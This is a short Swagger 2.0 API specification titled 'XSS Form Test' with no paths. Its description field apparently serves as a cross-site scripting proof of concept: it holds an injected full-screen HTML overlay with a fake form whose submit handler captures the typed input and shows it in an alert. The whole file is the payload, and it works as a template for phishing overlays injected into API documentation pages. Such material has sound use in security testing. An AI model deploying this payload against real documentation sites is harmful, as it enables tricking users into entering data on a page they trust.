swagger: '2.0'
info:
  title: XSS Form Test
  description: |
    <div id="modalBox" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 9999;">
      <form id="fakeForm" onsubmit="event.preventDefault(); alert('Captured input: ' + document.getElementById('userInput').value);"
            style="background-color: white; padding: 20px; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3); text-align: center; width: 300px;">
        <label for="userInput">Enter Information:</label><br>
        <input type="text" id="userInput" placeholder="Enter text" style="width: 100%; margin: 10px 0; padding: 5px;"><br>
        <button type="submit" style="width: 100%; padding: 5px; background-color: #4CAF50; color: white; border: none; border-radius: 4px;">Submit</button>
      </form>
    </div>
  version: "1.0.0"
paths: {}
